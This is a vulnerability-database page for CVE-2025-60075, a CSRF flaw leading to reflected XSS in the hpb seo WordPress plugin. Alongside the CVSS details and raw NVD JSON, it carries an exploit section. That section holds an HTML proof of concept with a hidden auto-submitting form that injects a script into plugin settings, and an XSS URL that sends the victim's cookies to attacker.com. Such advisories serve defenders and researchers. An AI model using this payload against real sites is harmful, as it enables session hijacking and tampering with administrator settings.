Security Vulnerability Report
中文
CVE-2025-60075 CVSS 7.1 HIGH

CVE-2025-60075

Published: 2025-10-29 09:15:38
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Allegro Marketing hpb seo plugin for WordPress hpbseo allows Reflected XSS.This issue affects hpb seo plugin for WordPress: from n/a through <= 3.0.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HPB SEO插件 <= 3.0.1(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60075 CSRF + Reflected XSS PoC --> <!-- This PoC demonstrates the CSRF vulnerability that leads to Reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-60075 PoC</title> </head> <body> <h1>CSRF Attack PoC for CVE-2025-60075</h1> <p>This page demonstrates how an attacker can exploit the CSRF vulnerability in HPB SEO plugin.</p> <!-- Hidden form that auto-submits to exploit CSRF --> <form id="csrfForm" action="http://target-site/wp-admin/admin.php" method="POST" style="display:none;"> <input type="hidden" name="page" value="hpbseo_settings"> <input type="hidden" name="option" value="hpbseo_update"> <input type="hidden" name="hpbseo_custom" value="<script>alert('XSS via CSRF')</script>"> </form> <!-- Reflected XSS payload in URL parameter --> <p>Reflected XSS PoC URL:</p> <code>http://target-site/wp-admin/admin.php?page=hpbseo_settings&param=<script>document.location='http://attacker.com/steal?c='+document.cookie</script></code> <script> // Auto-submit CSRF form when page loads // Uncomment the line below to execute the CSRF attack // document.getElementById('csrfForm').submit(); // Display the attack URLs const targetUrl = window.location.origin + '/wp-admin/admin.php'; const xssPayload = '<script>alert(document.cookie)</script>'; const maliciousUrl = targetUrl + '?page=hpbseo_settings&search=' + encodeURIComponent(xssPayload); console.log('Target URL:', targetUrl); console.log('Malicious XSS URL:', maliciousUrl); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60075", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:38.077", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Allegro Marketing hpb seo plugin for WordPress hpbseo allows Reflected XSS.This issue affects hpb seo plugin for WordPress: from n/a through <= 3.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hpbseo/vulnerability/wordpress-hpb-seo-plugin-for-wordpress-plugin-3-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}